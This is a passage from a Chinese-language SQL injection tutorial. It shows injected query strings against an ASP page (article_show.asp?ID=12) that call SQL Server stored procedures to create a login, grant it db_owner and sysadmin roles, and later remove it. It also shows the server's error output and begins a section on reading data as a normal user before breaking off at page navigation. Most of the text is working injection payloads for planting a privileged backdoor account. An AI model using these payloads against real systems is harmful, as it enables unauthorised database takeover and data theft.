| 添加一个SQL Server登录:
article_show.asp?ID=12;EXEC sp_addlogin ''''uname'''',''''pwd''''--
将该登录添加为db_owner角色:
article_show.asp?ID=12;EXEC sp_adduser ''''uname'''',''''登录名'''',''''db_owner''''--
将该登录添加为sysadmin固定服务器角色:
article_show.asp?ID=12;EXEC sp_addsrvrolemember ''''uname'''',''''sysadmin''''--
相反操作:
将该登录从sysadmin固定服务器角色中删除:
article_show.asp?ID=12;EXEC sp_dropsrvrolemember ''''uname'''',''''sysadmin''''--
将该登录从db_owner角色中删除:
article_show.asp?ID=12;EXEC sp_dropuser ''''uname''''
删除该登录:
article_show.asp?ID=12;EXEC sp_droplogin ''''uname''''
以上操作一般服务器会出现下面的出信息或者正常显示ID=12的网页:
错误 ''''80020009''''
发生意外。
五、普通权限用户可进行的操作:
普通用户不能使用第四节中列出的命令,但仍可读出数据库中所有的数据。
使用下面的语句列出数据库中第一个表的名 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >> | 
